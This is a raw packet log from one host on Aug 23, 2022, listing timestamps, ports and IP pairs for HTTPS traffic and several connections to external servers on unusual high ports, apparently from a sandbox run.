Aug 23, 2022 03:43:59.363692045 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.363722086 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.363727093 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.363728046 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.363739967 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.363778114 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.363785028 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.363812923 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.363836050 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.363845110 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.363850117 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.363853931 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.363887072 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.363929987 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.364058018 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.364079952 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.364129066 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.364135981 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.364144087 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.364187002 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.364586115 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.364608049 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.364672899 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.364681005 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.364710093 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.364737034 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.364772081 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.364794016 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.364844084 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.364883900 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.364892006 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.364923000 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.365041971 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.365062952 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.365103960 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.365111113 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.365236998 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.365268946 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.365641117 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.365664005 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.365725994 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.365731955 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.365767956 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.365808010 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.365844965 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.365865946 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.365921974 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.365927935 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.366005898 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.366095066 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.366116047 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.366163969 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.366175890 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.366188049 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.366214037 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.366544008 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.366563082 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.366636992 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.366647005 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.366719007 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.366940975 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.366966009 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.367042065 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.367049932 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.367114067 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.367135048 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.367155075 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.367192984 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.367212057 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.367221117 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.367260933 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.367305994 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.367326975 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.367417097 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.367434025 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.367487907 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.367552996 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.367574930 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.367623091 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.367635012 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.367656946 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.367679119 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.368001938 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.368024111 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.368098021 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.368112087 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.368160963 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.368199110 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.368220091 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.368272066 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.368283987 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.368308067 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.368350983 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.368581057 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.368602037 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.368654013 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.368665934 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.368710041 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.368725061 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.368736982 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.368758917 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.368804932 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.368845940 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.422910929 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.422950983 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.423069954 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.423397064 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.423412085 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.423441887 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.423470020 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.423554897 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.423572063 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.423619032 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.423640013 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.423717022 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.423732996 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.423856974 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.423871040 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.423882961 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.423939943 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.423957109 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.424001932 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.424062967 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.424139977 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.424164057 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.424176931 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.424185991 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.424210072 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.424247026 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.424346924 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.424366951 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.424392939 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.424411058 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.424433947 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.424448967 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.424521923 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.424566031 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.424618959 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.424678087 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.424705029 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.424858093 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.424876928 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.424906969 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.425008059 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.425043106 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.425110102 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.425153017 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.425173044 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.425219059 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.425260067 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.425301075 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.425358057 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.425421953 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.425462961 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.425479889 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.425539017 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.425554991 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.425576925 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.425637960 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.425659895 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.425739050 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.425755978 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.425774097 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.425829887 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.425836086 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.425867081 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.425920010 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.425942898 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.425957918 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.425971985 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.426033974 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.426111937 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.426234961 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.426287889 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.426320076 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.426337004 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.426440001 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.426462889 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.426526070 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.426578999 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.426625013 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.426651955 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.426675081 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.426706076 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.426775932 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.426831007 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.426868916 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.426889896 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.426906109 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.426917076 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.426971912 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.427010059 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.427062035 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.427114964 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.427133083 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.427211046 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.427229881 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.427314997 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.427413940 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.427418947 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.427448988 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.427496910 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.427510977 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.427647114 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.427706957 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.427733898 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.427746058 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.427778959 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.427798033 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.427841902 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.427901030 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.427954912 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.427982092 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.427998066 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.428009033 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.428029060 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.428040981 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.428127050 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.428148985 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.428210974 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.465274096 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.465679884 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.566157103 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:44:29.340692043 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:44:29.652477026 CEST	34589	49914	103.89.90.61	192.168.2.3
Aug 23, 2022 03:44:29.652703047 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:44:34.024560928 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:44:34.335855961 CEST	34589	49914	103.89.90.61	192.168.2.3
Aug 23, 2022 03:44:34.376873970 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:44:45.761780977 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:44:46.072690964 CEST	34589	49914	103.89.90.61	192.168.2.3
Aug 23, 2022 03:44:46.274605989 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:44:46.902055979 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:44:46.939795971 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:44:46.939939976 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:45:10.316978931 CEST	49960	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 03:45:10.360340118 CEST	16525	49960	195.54.170.157	192.168.2.3
Aug 23, 2022 03:45:10.360529900 CEST	49960	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 03:45:14.133012056 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:45:14.290093899 CEST	49960	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 03:45:14.334338903 CEST	16525	49960	195.54.170.157	192.168.2.3
Aug 23, 2022 03:45:14.379431963 CEST	49960	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 03:45:14.447105885 CEST	34589	49914	103.89.90.61	192.168.2.3
Aug 23, 2022 03:45:14.447731972 CEST	34589	49914	103.89.90.61	192.168.2.3
Aug 23, 2022 03:45:14.447822094 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:45:14.448153019 CEST	34589	49914	103.89.90.61	192.168.2.3
Aug 23, 2022 03:45:14.578071117 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:45:19.360707998 CEST	49969	9582	192.168.2.3	176.113.115.146
Aug 23, 2022 03:45:19.422733068 CEST	9582	49969	176.113.115.146	192.168.2.3
Aug 23, 2022 03:45:19.422883034 CEST	49969	9582	192.168.2.3	176.113.115.146
Aug 23, 2022 03:45:26.263609886 CEST	49969	9582	192.168.2.3	176.113.115.146
Aug 23, 2022 03:45:26.326711893 CEST	9582	49969	176.113.115.146	192.168.2.3
Aug 23, 2022 03:45:26.390865088 CEST	49969	9582	192.168.2.3	176.113.115.146
Aug 23, 2022 03:45:32.508486986 CEST	49984	40915	192.168.2.3	185.191.229.101
Aug 23, 2022 03:45:32.519308090 CEST	49960	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 03:45:32.563966036 CEST	16525	49960	195.54.170.157	192.168.2.3
Aug 23, 2022 03:45:32.650429010 CEST	40915	49984	185.191.229.101	192.168.2.3
Aug 23, 2022 03:45:32.650660992 CEST	49984	40915	192.168.2.3	185.191.229.101
Aug 23, 2022 03:45:32.776907921 CEST	49960	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 03:45:39.066243887 CEST	49984	40915	192.168.2.3	185.191.229.101
Aug 23, 2022 03:45:39.200788975 CEST	40915	49984	185.191.229.101	192.168.2.3
Aug 23, 2022 03:45:39.278178930 CEST	49984	40915	192.168.2.3	185.191.229.101
Aug 23, 2022 03:45:47.295583963 CEST	49969	9582	192.168.2.3	176.113.115.146
Aug 23, 2022 03:45:47.359833956 CEST	9582	49969	176.113.115.146	192.168.2.3
Aug 23, 2022 03:45:47.581479073 CEST	49969	9582	192.168.2.3	176.113.115.146
Aug 23, 2022 03:46:10.811280966 CEST	49984	40915	192.168.2.3	185.191.229.101
Aug 23, 2022 03:46:10.948600054 CEST	40915	49984	185.191.229.101	192.168.2.3
Aug 23, 2022 03:46:10.995322943 CEST	49984	40915	192.168.2.3	185.191.229.101
Aug 23, 2022 03:46:16.310023069 CEST	49960	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 03:46:16.355937004 CEST	16525	49960	195.54.170.157	192.168.2.3
Aug 23, 2022 03:46:16.355967999 CEST	16525	49960	195.54.170.157	192.168.2.3
Aug 23, 2022 03:46:16.355988979 CEST	16525	49960	195.54.170.157	192.168.2.3
Aug 23, 2022 03:46:16.356025934 CEST	49960	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 03:46:16.496021986 CEST	49960	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 03:46:16.909214973 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:46:17.210190058 CEST	49960	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 03:46:17.220874071 CEST	34589	49914	103.89.90.61	192.168.2.3
Aug 23, 2022 03:46:17.228606939 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:46:17.254162073 CEST	16525	49960	195.54.170.157	192.168.2.3
Aug 23, 2022 03:46:17.263400078 CEST	49960	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 03:46:17.306946039 CEST	16525	49960	195.54.170.157	192.168.2.3
Aug 23, 2022 03:46:17.309564114 CEST	49960	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 03:46:17.353080988 CEST	16525	49960	195.54.170.157	192.168.2.3
Aug 23, 2022 03:46:17.358009100 CEST	49960	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 03:46:17.401627064 CEST	16525	49960	195.54.170.157	192.168.2.3
Aug 23, 2022 03:46:17.486972094 CEST	49960	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 03:46:17.531253099 CEST	16525	49960	195.54.170.157	192.168.2.3
Aug 23, 2022 03:46:17.539691925 CEST	34589	49914	103.89.90.61	192.168.2.3
Aug 23, 2022 03:46:17.551606894 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:46:17.681886911 CEST	49960	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 03:46:17.863482952 CEST	34589	49914	103.89.90.61	192.168.2.3
Aug 23, 2022 03:46:17.868722916 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:46:17.961419106 CEST	49960	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 03:46:18.005362988 CEST	16525	49960	195.54.170.157	192.168.2.3
Aug 23, 2022 03:46:18.005719900 CEST	16525	49960	195.54.170.157	192.168.2.3
Aug 23, 2022 03:46:18.118225098 CEST	49960	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 03:46:18.161748886 CEST	16525	49960	195.54.170.157	192.168.2.3
Aug 23, 2022 03:46:18.161798000 CEST	16525	49960	195.54.170.157	192.168.2.3
Aug 23, 2022 03:46:18.161931992 CEST	49960	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 03:46:18.161952019 CEST	16525	49960	195.54.170.157	192.168.2.3
Aug 23, 2022 03:46:18.161978006 CEST	49960	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 03:46:18.162029028 CEST	49960	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 03:46:18.162117958 CEST	16525	49960	195.54.170.157	192.168.2.3
Aug 23, 2022 03:46:18.162173033 CEST	49960	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 03:46:18.162277937 CEST	16525	49960	195.54.170.157	192.168.2.3
Aug 23, 2022 03:46:18.162348032 CEST	49960	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 03:46:18.162434101 CEST	16525	49960	195.54.170.157	192.168.2.3
Aug 23, 2022 03:46:18.162477970 CEST	49960	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 03:46:18.180715084 CEST	34589	49914	103.89.90.61	192.168.2.3
Aug 23, 2022 03:46:18.181996107 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:46:18.206228018 CEST	16525	49960	195.54.170.157	192.168.2.3
Aug 23, 2022 03:46:18.206260920 CEST	16525	49960	195.54.170.157	192.168.2.3
Aug 23, 2022 03:46:18.206279039 CEST	16525	49960	195.54.170.157	192.168.2.3
Aug 23, 2022 03:46:18.206296921 CEST	16525	49960	195.54.170.157	192.168.2.3
Aug 23, 2022 03:46:18.206331968 CEST	49960	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 03:46:18.206482887 CEST	16525	49960	195.54.170.157	192.168.2.3
Aug 23, 2022 03:46:18.206504107 CEST	16525	49960	195.54.170.157	192.168.2.3
Aug 23, 2022 03:46:18.206523895 CEST	16525	49960	195.54.170.157	192.168.2.3
Aug 23, 2022 03:46:18.206542015 CEST	16525	49960	195.54.170.157	192.168.2.3
Aug 23, 2022 03:46:18.206559896 CEST	16525	49960	195.54.170.157	192.168.2.3
Aug 23, 2022 03:46:18.206578970 CEST	16525	49960	195.54.170.157	192.168.2.3
Aug 23, 2022 03:46:18.206595898 CEST	16525	49960	195.54.170.157	192.168.2.3
Aug 23, 2022 03:46:18.249695063 CEST	16525	49960	195.54.170.157	192.168.2.3
Aug 23, 2022 03:46:18.249839067 CEST	16525	49960	195.54.170.157	192.168.2.3
Aug 23, 2022 03:46:18.250075102 CEST	16525	49960	195.54.170.157	192.168.2.3
Aug 23, 2022 03:46:18.291318893 CEST	49960	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 03:46:18.544656992 CEST	34589	49914	103.89.90.61	192.168.2.3
Aug 23, 2022 03:46:18.553745985 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:46:18.823626995 CEST	49960	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 03:46:18.865562916 CEST	34589	49914	103.89.90.61	192.168.2.3
Aug 23, 2022 03:46:18.865605116 CEST	34589	49914	103.89.90.61	192.168.2.3
